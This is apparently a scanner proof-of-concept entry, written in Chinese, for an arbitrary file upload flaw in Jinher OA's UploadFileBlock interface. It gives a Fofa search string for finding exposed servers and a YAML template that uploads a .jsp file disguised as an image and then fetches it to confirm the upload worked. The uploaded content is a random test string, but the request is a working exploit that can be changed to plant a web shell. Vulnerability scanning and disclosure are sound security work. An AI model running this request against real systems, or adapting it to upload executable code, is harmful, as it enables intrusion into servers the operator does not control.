漏洞描述
金和OA UploadFileBlock接口任意文件上传
Fofa: app="金和网络-金和OA"||body="/jc6/platform/sys/login"
jinher-uploadfileblock-fileupload: 金和OA UploadFileBlock接口任意文件上传
PoC代码[已公开]
id: jinher-uploadfileblock-fileupload
info:
name: 金和OA UploadFileBlock接口任意文件上传
author: zan8in
severity: critical
verified: true
description: |-
金和OA UploadFileBlock接口任意文件上传
Fofa: app="金和网络-金和OA"||body="/jc6/platform/sys/login"
reference:
- https://www.exploit-db.com/exploits/45732
tags: jinher,fileupload,oa
created: 2024/02/28
set:
randstr: randomLowercase(6)
randbody: randomLowercase(32)
rboundary: randomLowercase(8)
rules:
r0:
request:
method: POST
path: /jc6/JHSoft.WCF/Attachment/UploadFileBlock
headers:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
body: "\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"filename\";filename=\"{{randstr}}.jsp\"\r\n\
Content-Type: image/jpeg\r\n\
\r\n\
{{randbody}}\r\n\
------WebKitFormBoundary{{rboundary}}--\r\n\
"
expression: response.status == 200 && response.body.bcontains(b'fileObj') && response.body.bcontains(b'realUrl')
r1:
request:
method: GET
path: /jc6/upload/{{randstr}}.jsp
expression: response.status == 200 && response.body.bcontains(bytes(randbody))
expression: r0() && r1()